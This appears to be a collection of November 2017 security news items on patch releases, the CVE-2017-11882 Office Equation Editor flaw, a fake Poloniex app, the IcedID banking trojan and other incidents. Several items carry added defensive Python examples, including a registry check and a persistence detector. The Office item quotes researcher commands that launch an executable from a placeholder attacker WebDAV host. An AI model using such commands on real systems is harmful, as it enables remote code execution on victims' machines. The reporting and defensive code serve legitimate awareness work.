Patch Tuesday: Microsoft Releases Update to Fix 53 Vulnerabilities
15.11.2017 thehackernews Vulnerability

It's Patch Tuesday—time to update your Windows devices.
Microsoft has released a large batch of security updates as part of its November Patch Tuesday to fix a total of 53 new security vulnerabilities in various Windows products, 19 of which are rated critical, 31 important and 3 moderate.
The vulnerabilities impact the Windows OS, Microsoft Office, Microsoft Edge, Internet Explorer, Microsoft Scripting Engine, .NET Core, and more.
At least four of these vulnerabilities that the tech giant has now fixed have public exploits, allowing attackers to exploit them easily. But fortunately, none of the four are being used in the wild, according to Gill Langston at security firm Qualys.
The four vulnerabilities with public exploits are identified by Microsoft as CVE-2017-8700 (an information disclosure flaw in ASP.NET Core), CVE-2017-11827 (Microsoft browsers remote code execution), CVE-2017-11848 (Internet Explorer information disclosure) and CVE-2017-11883 (denial of service affecting ASP.NET Core).
Potentially Exploitable Security Vulnerabilities
What's interesting about this month's Patch Tuesday is that none of the Windows OS patches are rated as Critical. However, the Device Guard Security Feature Bypass Vulnerability (CVE-2017-11830) and the Privilege Elevation flaw (CVE-2017-11847) are the ones you should focus on.
Also, according to an analysis of Patch Tuesday fixes by Zero-Day Initiative, CVE-2017-11830 and another flaw identified as CVE-2017-11877 can be exploited to spread malware.
"CVE-2017-11830 patches a Device Guard security feature bypass vulnerability that would allow malware authors to falsely authenticated files," Zero-Day Initiative said.
"CVE-2017-11877 fixes an Excel security feature bypass vulnerability that fails to enforce macro settings, which are often used by malware developers."
The tech giant also fixed six remote code execution vulnerabilities that exist "in the way the scripting engine handles objects in memory in Microsoft browsers."
Microsoft identified these vulnerabilities as CVE-2017-11836, CVE-2017-11837, CVE-2017-11838, CVE-2017-11839, CVE-2017-11871, and CVE-2017-11873, which could corrupt memory in such a way that attackers could execute malicious code in the context of the current user.
"In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge and then convince a user to view the website," Microsoft said. "These websites could contain specially crafted content that could exploit the vulnerability."
17-Year-Old MS Office Flaw Lets Hackers Install Malware
Also, you should be extra careful when opening files in MS Office.
All versions of Microsoft Office released in the past 17 years were found vulnerable to a remote code execution flaw (CVE-2017-11882) that works against all versions of the Windows operating system, including the latest Microsoft Windows 10 Creators Update.
Due to improper memory operations, the affected Office component fails to properly handle objects in memory, corrupting it in such a way that an attacker could execute malicious code in the context of the logged-in user.
Exploitation of this vulnerability requires opening a specially crafted malicious file with an affected version of Microsoft Office or Microsoft WordPad software, which could allow attackers to remotely install malware on targeted computers.
Adobe Patch Tuesday: Patches 62 Vulnerabilities
Besides fixing vulnerabilities in its various products, Microsoft has also released updates for Adobe Flash Player.
These updates correspond with Adobe Update APSB17-33, which patches 62 CVEs for Acrobat and Reader alone. So, Flash Player users are advised to ensure that they update Adobe across their environment to stay protected.
It should also be noted that last Patch Tuesday, Microsoft quietly released the patch for the dangerous KRACK vulnerability (CVE-2017-13080) in the WPA2 wireless protocol.
Therefore, users are also recommended to make sure that they have applied last month's security patches.
In any case, users are strongly advised to apply the November security patches as soon as possible in order to keep hackers and cybercriminals from taking control of their computers.
For installing security updates, just head on to Settings → Update & security → Windows Update → Check for updates, or you can install the updates manually.


17-Year-Old MS Office Flaw Lets Hackers Install Malware Without User Interaction
15.11.2017 thehackernews Vulnerability

You should be extra careful when opening files in MS Office.
While the world is still dealing with the threat of the 'unpatched' built-in DDE feature of Microsoft Office, researchers have uncovered a serious issue with another Office component that could allow attackers to remotely install malware on targeted computers.
The vulnerability is a memory-corruption issue that resides in all versions of Microsoft Office released in the past 17 years, including Microsoft Office 365, and works against all versions of Windows operating system, including the latest Microsoft Windows 10 Creators Update.
Discovered by the security researchers at Embedi, the vulnerability leads to remote code execution, allowing an unauthenticated, remote attacker to execute malicious code on a targeted system without requiring user interaction after opening a malicious document.
The vulnerability, identified as CVE-2017-11882, resides in EQNEDT32.EXE, an MS Office component which is responsible for insertion and editing of equations (OLE objects) in documents.
However, due to improper memory operations, the component fails to properly handle objects in the memory, corrupting it in such a way that the attacker could execute malicious code in the context of the logged-in user.
Seventeen years ago, EQNEDT32.EXE was introduced in Microsoft Office 2000 and had been kept in all versions released after Microsoft Office 2007 in order to ensure the software remains compatible with documents of older versions.
DEMO: Exploitation Allows Full System Take Over
Exploitation of this vulnerability requires opening a specially crafted malicious file with an affected version of Microsoft Office or Microsoft WordPad software.
This vulnerability could be exploited to take complete control over a system when combined with Windows Kernel privilege escalation exploits (like CVE-2017-11847).
Possible Attack Scenario:
While explaining the scope of the vulnerability, Embedi researchers suggested several attack scenarios listed below:
"By inserting several OLEs that exploited the described vulnerability, it was possible to execute an arbitrary sequence of commands (e.g., to download an arbitrary file from the Internet and execute it)."
"One of the easiest ways to execute arbitrary code is to launch an executable file from the WebDAV server controlled by an attacker."
"Nonetheless, an attacker can use the described vulnerability to execute the commands like cmd.exe /c start \\attacker_ip\ff. Such a command can be used as a part of an exploit and triggers starting WebClient."
"After that, an attacker can start an executable file from the WebDAV server by using the \\attacker_ip\ff\1.exe command. The starting mechanism of an executable file is similar to that of the \\live.sysinternals.com\tools service."
Protection Against Microsoft Office Vulnerability
With this month's Patch release, Microsoft has addressed this vulnerability by changing how the affected software handles objects in memory.
So, users are strongly recommended to apply November security patches as soon as possible to keep hackers and cybercriminals away from taking control of their computers.
Since this component has a number of security issues which can be easily exploited, disabling it could be the best way to ensure your system security.
Users can run the following command in the command prompt to disable registering of the component in Windows registry:
reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
For a 32-bit Microsoft Office package on a 64-bit OS, run the following command:
reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
Besides this, users should also enable Protected View (Microsoft Office sandbox) to prevent active content execution (OLE/ActiveX/Macro).
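A way to check, from the output of `reg query`, whether the kill bit that the two commands above set is actually present on a machine, as an added example that is not part of the original article: the code assumes that bit 0x400 of the Compatibility Flags value is the COM kill bit (which is what the commands above rely on) and that the `/f` switch of `reg add` overwrites an existing value without prompting; it parses a constructed copy of `reg query` output rather than reading the live registry, so it runs on any system.

```python
import re

# CLSID of the Equation Editor COM class, taken from the article's reg commands.
EQNEDT_CLSID = "{0002CE02-0000-0000-C000-000000000046}"
# Assumption: bit 0x400 of "Compatibility Flags" is the COM kill bit.
KILL_BIT = 0x400

# Regex for a value line as `reg query` prints it:
#   "    Compatibility Flags    REG_DWORD    0x400"
VALUE_LINE = re.compile(r"^\s*Compatibility Flags\s+REG_DWORD\s+(0x[0-9A-Fa-f]+)\s*$")

# Constructed sample of `reg query` output for the two keys the article names:
# the native key already has the kill bit, the Wow6432Node key does not.
SAMPLE_REG_QUERY_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}
    Compatibility Flags    REG_DWORD    0x400

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}
    Compatibility Flags    REG_DWORD    0x0
"""


def parse_reg_query(output: str) -> dict:
    """Map each key path in the output to its Compatibility Flags value
    (an int), or None when the key is listed but carries no such value."""
    flags_by_key = {}
    current = None
    for line in output.splitlines():
        stripped = line.strip()
        if stripped.upper().startswith(("HKEY_LOCAL_MACHINE\\", "HKLM\\")):
            current = stripped
            flags_by_key.setdefault(current, None)
            continue
        match = VALUE_LINE.match(line)
        if match and current is not None:
            flags_by_key[current] = int(match.group(1), 16)
    return flags_by_key


def kill_bit_set(flags) -> bool:
    """True only when the value exists and has the kill bit in it
    (0x401 counts; 0x0 or a missing value does not)."""
    return flags is not None and (flags & KILL_BIT) != 0


def assess(output: str) -> dict:
    """{key_path: kill bit present?} for every key in the output."""
    return {key: kill_bit_set(flags) for key, flags in parse_reg_query(output).items()}


def remediation_commands(output: str) -> list:
    """The article's `reg add` line for every key still lacking the kill bit.
    Other flag bits already present are kept (OR-ed with 0x400) and /f is
    added so the command overwrites without an interactive prompt."""
    commands = []
    for key, flags in parse_reg_query(output).items():
        if not kill_bit_set(flags):
            new_value = (flags or 0) | KILL_BIT
            commands.append(
                f'reg add "{key}" /v "Compatibility Flags" /t REG_DWORD /d 0x{new_value:x} /f'
            )
    return commands


if __name__ == "__main__":
    for key, present in assess(SAMPLE_REG_QUERY_OUTPUT).items():
        print(("kill bit SET     " if present else "kill bit MISSING ") + key)
    for command in remediation_commands(SAMPLE_REG_QUERY_OUTPUT):
        print(command)
```

On a real machine, replace the constructed text with the captured output of `reg query "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}"` (and the Wow6432Node variant); checking the bit rather than comparing for equality with 0x400 means a value that already carries other compatibility flags is not misreported.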


American secret agent stole millions. In bitcoins

15.11.2017 Novinky/Bezpečnost Crime
Shaun Bridges wanted to stash away a sizeable pile of money while he was still working as an agent of the United States Secret Service. It amounted to almost ten million Czech crowns, which he stole in bitcoins during the investigation of the illegal online marketplace Silk Road.
Former secret agent Shaun Bridges in an archive photo

Bitcoins and other virtual currencies
There are many virtual currencies. One of the oldest and currently most popular is the so-called bitcoin. It was created back in 2009 but has enjoyed greater popularity in recent years. The currency was designed so that it cannot be influenced by any government or central bank.

The cyber coins are "minted" by a network of computers running specialised software programmed to release new coins at a steady but ever-decreasing rate. The number of coins in circulation is to eventually reach 21 million, which is expected around the year 2140.

Bitcoins and other cryptocurrencies are very popular mainly as an investment vehicle. Their exchange rates, however, fluctuate frequently. The European Banking Authority has therefore even warned consumers that unregulated virtual currencies pose a high risk, since deposits in them are not protected in any way.

Bitcoins are used very often on illegal marketplaces. Criminals and computer pirates frequently take advantage of the fact that transactions in this currency are not traceable in any way. And that is apparently what Bridges was trying to exploit too.

During the investigation he accumulated some 1,600 bitcoins. Instead of handing them over to his superiors, he hid them and then intended to use them for his own needs.

At the current exchange rate one bitcoin is worth around 6,500 dollars, i.e. more than 142,000 crowns. A stash of 1,600 virtual coins would thus be worth over a quarter of a billion crowns.

The secret agent, however, embezzled the bitcoins in 2013, when they were worth considerably less: one coin was then trading at roughly six thousand crowns, so the loot was worth only 9.6 million crowns in total.

Two years behind bars
Bridges did not enjoy his loot for long, however, and was finally caught this August. In court he did not deny his guilt and, after promising to return 1,500 bitcoins, was sentenced last week to two years behind bars. The prosecutor had originally asked for six years in prison.

It should be noted that Bridges is not the only secret agent who has been in the sights of the US Federal Bureau of Investigation (FBI). A certain Carl Force, for example, is still evading justice.


Fraudsters profit from cryptocurrency enthusiasts. How to defend yourself?

15.11.2017 Novinky/Bezpečnost Fraud
Last week news went around the world that cybercriminals had managed to slip a fake app of the cryptocurrency exchange Poloniex to thousands of people. Security experts from the antivirus company Eset have now explained how the app robs users of personal data and funds, and how people can defend themselves against similar scams.

Poloniex is one of the largest exchanges of its kind; more than a hundred different types of virtual coins are traded there, including of course the most popular ones, bitcoins.

It is precisely because of this popularity that computer pirates targeted it in recent months. They managed to smuggle fraudulent apps that looked like official programs from the exchange into the official Google Play store.

That the fraudulent apps were really well made is confirmed by the fact that more than five thousand people from various corners of the world installed them on their devices.

How many users ultimately exposed their login credentials to the cybercriminals, and how much the computer pirates earned at the expense of the defrauded people, is not clear at the moment. Security experts have nevertheless revealed how the pirates proceeded during the attack.

The attack was very sophisticated
"In order for the attackers to take over a Poloniex account using one of the malicious apps, they must first obtain the personal credentials for logging in to the account. They then need to gain access to the e-mail account associated with the compromised Poloniex account so that they can control notifications about unauthorised logins and transactions. And finally, the attackers want to create the impression that their app works correctly, in order to forestall any suspicion they might arouse in the user during the whole process," said Eset's technical director Miroslav Dvořák.

Computer pirates targeted users of the popular cryptocurrency exchange Poloniex.
The website of the cryptocurrency exchange Poloniex

He also recalled that the fraudulent apps were seen in two different versions and that both used the same attack method. "The theft of personal data happens immediately after the user launches one of the apps mentioned and enters their login credentials into it. The malicious app displays a fake page that asks for the login credentials for the Poloniex exchange. If the user fills in the sensitive data and clicks Sign in, the data are sent to the attackers," Dvořák explained.

"Once the attackers have access to the user's Poloniex account and to the associated Gmail account, they can carry out transactions on the user's behalf and at the same time delete all alerts about unauthorised logins and executed transactions that arrive in the user's mailbox," the security expert stressed.

The whole attack was so well disguised that its victims thought the app was working correctly. The computer pirates then fleeced the unsuspecting users gradually, dollar by dollar.

How to protect yourself?
As is clear from the lines above, it is advisable to use two-factor authentication to secure a Poloniex exchange account, i.e. verifying logins to the account with another device, for example a smartphone. The same applies to other online accounts; Facebook, for instance, can be secured in a similar way.

Security experts from Eset added several tips on how to defend against similar threats in the future:

Check whether the service you use actually offers a mobile app; if it does, the app should be linked from the service's official website.
Pay attention to the app's ratings from other users and read their reviews.
Be careful when third-party apps offer you notifications and dialogs that give the impression of being linked to a Google account; abusing users' trust in Google services is a popular trick among cybercriminals.
Increase your level of security by using two-step identity verification (2FA); its importance tends to be crucial.
Use reliable security solutions for your mobile devices. An antivirus program should be a matter of course on every device.
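To show what the second factor adds in the scenario above (a stolen password alone is not enough, because the valid code depends on a secret held on the second device and on the current time), here is a TOTP (RFC 6238) generator and verifier as an added example; it is not code from Eset or Poloniex. The secret is the RFC 4226/6238 reference test secret, so the outputs can be checked against the published test vectors; the `window` parameter (accepting one 30-second step either side to absorb clock drift) is a common deployment choice, not something the article specifies.

```python
import hashlib
import hmac
import struct

# RFC 4226 / RFC 6238 reference test secret (ASCII "12345678901234567890").
# Real deployments use a per-account random secret shared with the device.
RFC_TEST_SECRET = b"12345678901234567890"


def hotp(secret: bytes, counter: int, digits: int = 6, algo=hashlib.sha1) -> str:
    """HOTP (RFC 4226): HMAC over the 8-byte big-endian counter, dynamic
    truncation to 31 bits, then reduction to the requested number of digits."""
    mac = hmac.new(secret, struct.pack(">Q", counter), algo).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret: bytes, unix_time: float, step: int = 30, digits: int = 6,
         algo=hashlib.sha1) -> str:
    """TOTP (RFC 6238): HOTP with the counter derived from the time step."""
    return hotp(secret, int(unix_time) // step, digits, algo)


def verify_totp(secret: bytes, candidate: str, unix_time: float, step: int = 30,
                digits: int = 6, window: int = 1, algo=hashlib.sha1) -> bool:
    """Server-side check: accept the code for the current step and `window`
    steps either side. Every step is compared (no early return) with a
    constant-time comparison, so timing does not leak which step matched."""
    if len(candidate) != digits or not candidate.isdigit():
        return False
    counter = int(unix_time) // step
    accepted = False
    for delta in range(-window, window + 1):
        if counter + delta < 0:
            continue
        expected = hotp(secret, counter + delta, digits, algo)
        accepted |= hmac.compare_digest(expected, candidate)
    return accepted


if __name__ == "__main__":
    # Values below match the RFC test vectors: counter 0 -> 755224, time 59 -> 94287082.
    print("HOTP counter 0:", hotp(RFC_TEST_SECRET, 0))
    print("TOTP at t=59 (8 digits):", totp(RFC_TEST_SECRET, 59, digits=8))
    print("verify current code:", verify_totp(RFC_TEST_SECRET, "94287082", 59, digits=8))
    print("verify stale code:", verify_totp(RFC_TEST_SECRET, "07081804", 59, digits=8))
```

The phishing page in the article captures the password; without the shared secret the attacker cannot compute the next code, and a code they do manage to capture expires with its time step, which is why the verifier above rejects a code from a different step.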


Cloudflare uses a wall full of lava lamps to generate random numbers
15.11.2017 Živě.cz Security


Encryption depends heavily on random numbers. Generating them, however, is not as simple as it might seem. In the past there have been many cases where specialised hardware and software random number generators had a weakness that allowed the process to be gamed so that the next bit could be predicted more often than the completely random 50%.

Instead of dedicated machines or expensive physical sensing of various physical processes, Cloudflare uses an interesting and very effective system for generating randomness.

Cloudflare is a giant CDN through which roughly 10% of the internet passes. One of its primary services is protection against attacks of various kinds, so security and encryption are important to it.

To have numbers that are as close to random as possible, Cloudflare uses an unusual method: a wall full of lava lamps (LavaRand). A camera is pointed at this wall and continuously produces a varied image that changes randomly under a huge number of variables. As can be seen in the video, it depends not only on the movement of the bubbles in the individual lamps but also on the current backlighting, noise and so on.
Processing the streamed video of the glowing lamps yields random numbers, and only from these are the encryption keys then created. Simply put, a change in a single pixel of the image is enough for the resulting encryption key to be completely different from all previous ones. This key is then processed together with several other sources of entropy and finally serves as a seed for generating random keys.

Simulating a process with so many random components is practically impossible under current and most likely also future conditions. As Tom Scott says in the video, it is easier to break the encryption by brute force, and that is bound to computing power.

If you want to read more about this system, Cloudflare has published a detailed description on its blog.
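The two properties the article describes, that a single changed pixel yields a completely different result and that the camera-derived value is combined with other entropy sources before it seeds key generation, can be demonstrated with standard hashing. The following is an added example and is not Cloudflare's LavaRand code: the camera frame is replaced by a constructed deterministic byte buffer, the mixing is SHA-256 over length-prefixed sources, and the seed is expanded with an HMAC counter construction in the style of HKDF-Expand; all of these are this example's own choices, not a description of Cloudflare's pipeline.

```python
import hashlib
import hmac
import os

WIDTH, HEIGHT = 64, 48  # constructed tiny "camera frame", 3 bytes per pixel


def constructed_frame(seed: int) -> bytearray:
    """Deterministic stand-in for a camera capture (LCG-generated noise),
    constructed so the example runs without a camera."""
    buf = bytearray(WIDTH * HEIGHT * 3)
    x = seed & 0xFFFFFFFF
    for i in range(len(buf)):
        x = (1103515245 * x + 12345) & 0x7FFFFFFF
        buf[i] = (x >> 16) & 0xFF
    return buf


def flip_one_pixel(frame: bytearray, pixel_index: int = 0) -> bytearray:
    """Copy of the frame with one bit of one colour channel of one pixel changed."""
    changed = bytearray(frame)
    changed[pixel_index * 3] ^= 0x01
    return changed


def frame_digest(frame: bytearray) -> bytes:
    """Condense a whole frame into 32 bytes; the hash's avalanche effect is
    what turns a one-pixel change into a completely different value."""
    return hashlib.sha256(bytes(frame)).digest()


def hamming_distance(a: bytes, b: bytes) -> int:
    """Number of differing bits between two equal-length byte strings."""
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))


def mix_entropy(sources) -> bytes:
    """Fold several entropy sources into one 32-byte seed. Each source is
    length-prefixed so that different splits of the same bytes do not
    collide (e.g. [b"ab", b"c"] versus [b"a", b"bc"])."""
    h = hashlib.sha256()
    for src in sources:
        h.update(len(src).to_bytes(4, "big"))
        h.update(src)
    return h.digest()


def expand_seed(seed: bytes, n_bytes: int, info: bytes = b"lavarand-demo") -> bytes:
    """HKDF-Expand-style HMAC-SHA256 counter mode: derive n_bytes of key
    material from the seed (single-byte counter, so at most 255 blocks)."""
    out, block, counter = b"", b"", 1
    while len(out) < n_bytes:
        block = hmac.new(seed, block + info + bytes([counter]), hashlib.sha256).digest()
        out += block
        counter += 1
    return out[:n_bytes]


if __name__ == "__main__":
    frame = constructed_frame(1)
    altered = flip_one_pixel(frame, pixel_index=100)
    d1, d2 = frame_digest(frame), frame_digest(altered)
    print("original frame digest:", d1.hex())
    print("one-pixel change     :", d2.hex())
    print("bits differing       :", hamming_distance(d1, d2), "of 256")
    # Mix the camera-derived value with a second, independent source
    # (here the OS CSPRNG) before using it as a seed.
    seed = mix_entropy([d1, os.urandom(32)])
    print("derived key material :", expand_seed(seed, 32).hex())
```

The point of mixing is that the output stays unpredictable as long as at least one input is; a camera that is covered or frozen does not by itself weaken the seed, because the other sources still contribute.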


Forever 21 Investigating Payment Card Breach
15.11.2017 securityweek  Cyber
Los Angeles-based fashion retailer Forever 21 informed customers on Tuesday that it has launched an investigation into a security incident involving payment systems.

The company said it recently learned from a third-party that credit and debit cards used at certain Forever 21 stores may have been compromised.

An investigation has been launched and a cybersecurity and forensics firm has been called in to assist. Forever 21 has provided few details about the incident, but noted that its investigation focuses on transactions made between March and October 2017.

The company has promised to share more information, including the list of affected stores and timeframes, in the upcoming period. It did, however, highlight that security mechanisms implemented in many of its stores made stealing payment card information difficult.

“Because of the encryption and tokenization solutions that Forever 21 implemented in 2015, it appears that only certain point of sale devices in some Forever 21 stores were affected when the encryption on those devices was not in operation,” the company said in a statement.

In the meantime, the company has advised customers to keep a close eye on credit card statements and immediately notify their bank of any unauthorized charges.

Forever 21 operates over 800 stores in 57 countries around the world. The company is the 5th largest specialty retailer in the United States.

“With its endless POS endpoints, the retail industry has always been a desirable target for cybercriminals,” said Mark Cline, a VP at managed security services firm Netsurion. “They know that if they can introduce malware into POS networks, they can make a decent amount of cash by selling credit card numbers on the dark web. With their millions of customers, large retailers, like Forever 21, have typically been the hardest hit. Companies must pay up to $172 per stolen record in clean-up costs.”

“If retail businesses haven’t hardened their IT and POS security, they should start now to protect themselves from POS malware, ransomware and other threats—especially as we move into the holiday shopping season,” Cline added. “They may be running anti-virus software and managed firewalls, but they may or may not be running a strong offense with active monitoring and threat detection.”

Forever 21 is not the only clothing retailer to report a payment card breach this year. Brooks Brothers and Buckle also reported finding malware on their payment systems. Eddie Bauer informed customers of a cyber intrusion last year.


Flaw in Siemens RTU Allows Remote Code Execution
15.11.2017 securityweek  Vulnerability
Potentially serious vulnerabilities have been found in some Siemens SICAM remote terminal unit (RTU) modules, but patches will not be released as the product has been discontinued.

Researchers at IT security services and consulting company SEC Consult discovered the flaws in the SICAM RTU SM-2556 COM modules, which can be attached to SICAM 1703 and RTU substation controllers for LAN/WAN communications. The product is used worldwide in the energy and other sectors.

The most serious of the security holes is CVE-2017-12739, a critical vulnerability in the integrated web server that allows an unauthenticated attacker with network access to remotely execute code on affected devices.

The web server is also impacted by a reflected cross-site scripting (XSS) vulnerability that can be exploited by getting the targeted user to click on a link (CVE-2017-12738), and a flaw that can be exploited by a remote attacker to bypass authentication and obtain sensitive device information, including passwords (CVE-2017-12737).

The vulnerabilities affect devices running firmware versions ENOS00, ERAC00, ETA2, ETLS00, MODi00 and DNPi00. Since the product has been discontinued, Siemens has decided not to release patches. However, users can prevent potential attacks by disabling the affected web server, which is designed for diagnostics and is not needed for normal operation.

Siemens pointed out, however, that the vulnerable versions of the firmware may also be running on the SM-2558 COM module, the successor of SM-2556. The automation giant has advised customers to update to the newer ETA4, MBSiA0 and DNPiA1 firmware versions.

In its own advisory, SEC Consult said it reported the vulnerabilities to Siemens in late September. According to the company, the GoAhead web server used by the RTU module was released in October 2003 and is affected by several known vulnerabilities.

SEC Consult has published proof-of-concept (PoC) code for the authentication bypass and XSS vulnerabilities.

Researchers haven’t found many vulnerabilities in Siemens SICAM products. ICS-CERT has only published a handful of advisories in the past years, but they mostly describe high severity and critical flaws.


New IcedID Banking Trojan Emerges
15.11.2017 securityweek  Virus
A newly discovered banking Trojan called IcedID was built with a modular design and modern capabilities when compared to older financial threats, IBM X-Force warns.

The new threat was first observed in September 2017 as part of test campaigns, and is now actively targeting banks, payment card providers, mobile services providers, payroll accounts, webmail accounts and e-commerce sites in the United States, along with two major banks in the United Kingdom.

Although it does include features comparable with those of other banking Trojans out there and can perform advanced browser manipulation tactics, IcedID does not seem to borrow code from other Trojans, IBM says. However, because the threat includes capabilities already on par with those of Trojans such as Zeus, Gozi and Dridex, the researchers believe IcedID will receive further updates soon.

As part of the initial infection campaigns, the new banking Trojan has been dropped through the Emotet Trojan, which led X-Force research to believe that its operators aren’t new to the threat arena.

Emotet has been the distribution vehicle for many malware families this year, mainly focused on the U.S., but also targeting the U.K. and other parts of the world. In 2017, Emotet has been serving “elite cybercrime groups from Eastern Europe, such as those operating QakBot and Dridex,” and has now added IcedID to its payload list, IBM says.

First spotted in 2014 as a banking Trojan, Emotet is distributed via malicious spam emails, usually inside documents that feature malicious macros. Once on a machine, Emotet achieves persistence and ensnares the system into a botnet. It also fetches a spamming module, a network worm module, and password and data stealers.

IcedID itself includes network propagation capabilities, which suggests its authors might be targeting businesses with the new threat. IBM observed the malware infecting terminal servers, which usually provide endpoints, printers, and shared network devices with a common connection point to a local area network (LAN) or a wide area network (WAN).

The Trojan queries the lightweight directory access protocol (LDAP) to discover other users to infect, the researchers say. They also note that, on the compromised systems, the malware sets up a local proxy for traffic tunneling to monitor the victim’s online activity and leverages both web injections and redirections to perform its nefarious operations.

IcedID downloads the configuration file (containing a list of targets) from its command and control (C&C) server when the user opens a web browser. It was also observed using secure sockets layer (SSL) for communication with the server.

The malware doesn’t appear to feature advanced anti-virtual machine (VM) or anti-research techniques, although it does require a reboot to complete the deployment, most likely to evade sandboxes that do not emulate rebooting.

For persistence, the malware creates a RunKey in the registry, after which it writes an RSA crypto key to the system into the AppData folder. The researchers have yet to determine the exact purpose of this key.

The redirection technique employed by IcedID is designed to appear as seamless as possible to the victim. Thus, the legitimate bank’s URL is displayed in the address bar, along with the bank’s correct SSL certificate, which means that the connection with the actual bank’s site is kept alive. The victim, however, is tricked into revealing their credentials on a fake web page. Through social engineering, the victim is also fooled into revealing transaction authorization elements.

During a single campaign in late October, the Trojan was observed communicating with four different C&C servers.

The malware’s operators also use a dedicated, web-based remote panel to orchestrate webinjection attacks for the targeted bank sites. The panel is accessible with a username and password combination. The server the panel communicates with is based on the OpenResty web platform.

“Webinjection panels are typically commercial offerings criminals buy in underground markets. It is possible that IcedID uses a commercial panel or that IcedID itself is commercial malware. However, at this time there is no indication that IcedID is being sold in the underground or Dark Web marketplaces,” IBM notes.
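One detection a defender can derive from the persistence behaviour described above (a Run key autostart entry created at infection time, with the malware's files living under the user's AppData folder) is a rule over registry value-set events. The following is an added example and is not code from IBM X-Force: the log lines are constructed in a simple pipe-separated form that only borrows Sysmon's event ID 13 (registry value set) and its TargetObject/Details field names, and the "autostart value points into a user-writable directory" heuristic is a general one, not an IcedID-specific indicator.

```python
import re
from dataclasses import dataclass

# Autostart locations: per-user (HKCU/HKU) and machine-wide Run and RunOnce keys.
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
# Directories a non-admin user can write to; legitimate autostarts usually
# live under Program Files or Windows instead. Heuristic, not an IoC.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads)\\", re.IGNORECASE)

# Constructed sample events (not real telemetry). Only line 1 should fire.
SAMPLE_EVENTS = [
    r"EventID=13|Image=C:\Users\alice\AppData\Local\Temp\inv0ice.exe"
    r"|TargetObject=HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\svchelper"
    r"|Details=C:\Users\alice\AppData\Roaming\svchelper\svchelper.exe",
    r"EventID=13|Image=C:\Program Files\Microsoft OneDrive\OneDriveSetup.exe"
    r"|TargetObject=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive"
    r'|Details="C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background',
    r"EventID=1|Image=C:\Windows\System32\notepad.exe|CommandLine=notepad.exe notes.txt",
    r"EventID=13|Image=C:\Windows\System32\msiexec.exe"
    r"|TargetObject=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SomeApp\DisplayName"
    r"|Details=SomeApp",
]


@dataclass
class Finding:
    line_no: int
    target: str
    details: str
    reason: str


def parse_event(line: str) -> dict:
    """Parse the constructed 'Key=Value|Key=Value' line format."""
    fields = {}
    for part in line.strip().split("|"):
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields


def detect_run_key_persistence(lines) -> list:
    """Flag registry value-set events that create a Run/RunOnce autostart
    whose target lives in a user-writable directory."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        event = parse_event(line)
        if event.get("EventID") != "13":      # only registry value-set events
            continue
        target = event.get("TargetObject", "")
        details = event.get("Details", "")
        if not RUN_KEY.search(target):
            continue
        if USER_WRITABLE.search(details):
            findings.append(Finding(line_no, target, details,
                                    "Run key autostart points into a user-writable directory"))
    return findings


if __name__ == "__main__":
    for finding in detect_run_key_persistence(SAMPLE_EVENTS):
        print(f"line {finding.line_no}: {finding.reason}")
        print(f"  key : {finding.target}")
        print(f"  data: {finding.details}")
```

Run-key persistence is noisy on its own, so in practice this rule is one signal to correlate with others the article lists for IcedID: a reboot shortly after an Office document spawned a process, LDAP enumeration from a workstation, or browser traffic routed through a local proxy.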


Adobe Patches 80 Flaws Across Nine Products
15.11.2017 securityweek  Vulnerability
Adobe on Tuesday announced the availability of patches for a total of 80 vulnerabilities across the company’s Flash Player, Photoshop, Connect, Acrobat and Reader, DNG Converter, InDesign, Digital Editions, Shockwave Player, and Experience Manager products.

The highest number of vulnerabilities, 56, has been addressed in Acrobat and Reader for Windows and Mac. The list includes many critical uninitialized pointer access, use-after-free, buffer access, buffer over-read, buffer overflow, out-of-bounds read/write, improper array index validation, security bypass, type confusion, and untrusted pointer dereference issues that can be exploited for remote code execution.

A total of 16 companies and individuals have been credited for reporting the Acrobat and Reader security holes. Well over half of the flaws were discovered by employees of China-based Tencent.

Updates for the Windows, Mac, Linux and Chrome OS versions of Flash Player patch five critical out-of-bounds read and use-after-free vulnerabilities that can be exploited for remote code execution.

Critical code execution weaknesses have also been resolved in the Windows and Mac versions of Photoshop CC, and Shockwave Player for Windows.

In Adobe Connect, the company fixed four server-side request forgery (SSRF) and cross-site scripting (XSS) issues, and added a feature designed to help administrators protect users against clickjacking attacks.

In Digital Editions for Windows, Mac, iOS, and Android, Adobe addressed six bugs that can lead to disclosure of memory addresses and other information.

Adobe also advised users to update Experience Manager in order to address moderate and important severity XSS and information disclosure vulnerabilities. One critical memory corruption flaw was patched in DNG Converter for Windows, and one similar issue was resolved in InDesign for Windows and Mac.

Adobe says there is no evidence that any of these flaws have been exploited in the wild. On last month’s Patch Tuesday, Adobe announced that there had not been any security updates. However, the company was forced to release an out-of-band update just a few days later after learning of a Flash Player zero-day that had been exploited by a Middle Eastern threat actor to deliver spyware.

Microsoft has also released its Patch Tuesday updates. The company addressed more than 50 vulnerabilities, including 20 critical browser flaws.


Microsoft Patches 20 Critical Browser Vulnerabilities
15.11.2017 securityweek  Vulnerability
